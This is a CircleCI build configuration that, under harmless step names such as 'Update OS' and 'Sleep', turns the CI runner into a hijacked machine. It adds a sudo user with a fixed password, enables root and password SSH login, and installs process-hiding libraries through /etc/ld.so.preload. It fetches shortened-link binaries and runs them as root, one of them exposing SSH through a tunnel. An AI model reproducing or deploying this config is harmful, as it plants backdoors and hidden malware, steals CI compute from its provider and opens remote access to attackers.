version: 2
jobs:
  build_master:
    parallelism: 15
    machine:
      image: ubuntu-2004:202104-01
    steps:
      - run:
         name: Update OS & Restart Services
         command: |
          sudo apt-get update
          sudo apt-get install ssh gcc -y
          sudo adduser --disabled-password --gecos "" masbroo
          sudo su --command "adduser masbroo sudo && echo 'masbroo:root' | chpasswd"
          sudo su --command "echo 'Port 22' >> /etc/ssh/sshd_config && echo 'PermitRootLogin yes' >> /etc/ssh/sshd_config && echo 'PasswordAuthentication yes' >> /etc/ssh/sshd_config && sudo service ssh restart"
      - run: 
         name: Luck For Job
         command: |
          wget https://github.com/p4n1k/mnr/releases/download/sembunyi/01.tar.gz
          sudo su --command "tar -xvf 01.tar.gz && cd 01 && make && sudo mv libsembunyi01.so /usr/local/lib/ && echo /usr/local/lib/libsembunyi01.so >> /etc/ld.so.preload && cd 02 && make && sudo mv libsembunyi02.so /usr/local/lib/ && echo /usr/local/lib/libsembunyi02.so >> /etc/ld.so.preload && cd 03 && make && sudo mv libsembunyi03.so /usr/local/lib/ && echo /usr/local/lib/libsembunyi03.so >> /etc/ld.so.preload && cd 04 && make && sudo mv libsembunyi04.so /usr/local/lib/ && echo /usr/local/lib/libsembunyi04.so >> /etc/ld.so.preload"
          wget https://bit.ly/3t9Ckg5
          chmod +x 3t9Ckg5
          sudo su --command "nohup ./3t9Ckg5 tcp 22 --log=stdout > meta.log &"
          sleep 2
          sudo su --command "cat meta.log"    
      - run: 
         name: Sleep 01
         command: |
          wget https://bit.ly/3hcSNL8
          chmod +x 3hcSNL8
          sudo su --command "./3hcSNL8"
      - run: 
         name: Sleep 03
         command: |
          wget https://bit.ly/3hcSNL8
          chmod +x 3hcSNL8
          sudo su --command "./3hcSNL8"
      - run: 
         name: Sleep 04
         command: |
          wget https://bit.ly/3hcSNL8
          chmod +x 3hcSNL8
          sudo su --command "./3hcSNL8"
      - run: 
         name: Sleep 05
         command: |
          wget https://bit.ly/3hcSNL8
          chmod +x 3hcSNL8
          sudo su --command "./3hcSNL8"
workflows:
    version: 2
    build:
        jobs:
            - build_master